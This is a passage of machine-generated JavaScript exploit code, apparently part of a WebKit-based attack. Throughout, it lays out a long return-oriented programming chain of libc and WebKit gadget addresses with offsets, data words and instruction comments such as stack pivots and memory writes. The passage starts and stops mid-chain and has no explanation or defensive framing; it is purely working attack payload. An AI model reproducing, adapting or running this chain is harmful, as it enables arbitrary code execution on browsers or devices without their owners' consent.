libc_base+759608 //pop rax ]); //L11534: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11535: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L11536: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+525528, //L11538 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11538: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+525584, //L11539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11539: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+525720, //L11543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+525704, //L11542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11541: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11542: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11543: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+525856, //L11546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+525888, //L11548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, 
//pop rsi ropchain+525840, //L11545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11545: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11546: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11547: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11548: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+526000, //L11549+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+525992, //L11549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11549: db([0, 0]); // 0x0 set_gadgets([ ropchain+526016, //L11549+24 ropchain+530040, //L11544 //L11550: libc_base+764760, //pop rsi ropchain+526056, //L11551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11551: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11553: db([4294967204, 4294967295]); // -0x5c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+526176, //L11556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+526160, //L11554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11554: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11556: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+526352, //L11559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+526368, //L11560 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+526320, 
//L11557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+526336, //L11558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11557: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11558: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11559: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11560: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+526464, //L11562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+526448, //L11561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11561: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11562: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+526552, //L11564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11563: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L11564: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+526608, //L11565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11565: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11567: db([4294967204, 4294967295]); // -0x5c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+526688, //L11569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11569: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 
4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+526824, //L11572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+526808, //L11571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11570: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11571: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11572: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+526928, //L11574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+526912, //L11573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11573: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11574: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+527008, //L11575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11575: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11577: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+527128, //L11580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+527112, //L11578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11578: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11580: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+527304, //L11583 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+527320, //L11584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+527272, //L11581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+527288, //L11582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11581: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11582: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11583: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11584: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+527480, //L11588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+527448, //L11586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+527464, //L11587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11585: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11586: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11587: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11588: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+527568, //L11589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+527584, //L11590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11589: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11590: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+527760, //L11592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+527776, //L11593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+527744, //L11591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11591: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11592: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11593: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+527888, //L11595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+527936, //L11598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+527904, //L11596 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11595: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11596: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11597: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11598: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+528048, //L11599+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+528040, //L11599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11599: db([0, 0]); // 0x0 set_gadgets([ ropchain+528064, //L11599+24 ropchain+530008, //L11594 libc_base+764760, //pop rsi 
ropchain+528104, //L11600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11600: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11602: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+528224, //L11605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+528208, //L11603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11603: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11605: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+528368, //L11608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+528336, //L11606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+528352, //L11607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11606: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11607: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11608: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+528448, //L11609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11609: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11611: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+528568, //L11614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+528552, //L11612 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11612: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11614: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+528712, //L11617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+528680, //L11615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+528696, //L11616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11615: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11616: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11617: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+528800, //L11619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11618: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L11619: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+528856, //L11620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11620: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11622: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+528936, //L11624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11624: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub 
rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+529048, //L11625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11625: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11627: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+529168, //L11630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+529152, //L11628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11628: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11630: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+529312, //L11633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+529280, //L11631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+529296, //L11632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11631: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11632: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11633: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+529392, //L11634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11634: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11635: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L11636: db([32, 
0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+529520, //L11638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+529504, //L11637 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11637: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11638: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+529600, //L11639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11639: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11641: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+529720, //L11644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+529704, //L11642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11644: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+529800, //L11646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+529832, //L11648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11646: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L11647: ropchain+529960, //L11645 libc_base+144605 //pop rdi ]); //L11648: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+529936, 
//L11650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+529952, //L11649 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L11650: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L11649: db([0, 0]); // 0x0 //L11645: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+530024, //L11651 //L11594: libc_base+782311, //pop rsp ropchain+530040, //L11652 //L11651: libc_base+782311, //pop rsp ropchain+526016, //L11550 //L11652: //L11544: libc_base+764760, //pop rsi ropchain+530080, //L11653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11653: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11655: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+530200, //L11658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+530184, //L11656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11656: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11658: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+530344, //L11661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+530312, //L11659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+530328, //L11660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11659: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11660: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L11661: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+530432, //L11663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11662: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L11663: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+530488, //L11664 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11664: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11666: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+530568, //L11668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11668: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+548864, //L10599 //L8546: libc_base+759608 //pop rax ]); //L11669: db([8, 0]); // 0x8 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+530728, //L11671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11670: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11671: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11672: db([2, 0]); // 0x2 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+530832, //L11673 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+530848, //L11674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11673: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11674: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+530992, //L11677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+530976, //L11676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11675: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11676: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11677: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+531056, //L11678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11678: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11680: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L11682: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+531216, //L11685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+531200, //L11683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11683: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11685: db([0, 0]); // 0x0 
set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+531392, //L11688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+531408, //L11689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+531360, //L11686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+531376, //L11687 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11686: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11687: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11688: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11689: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+531504, //L11691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+531488, //L11690 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11690: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11691: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax 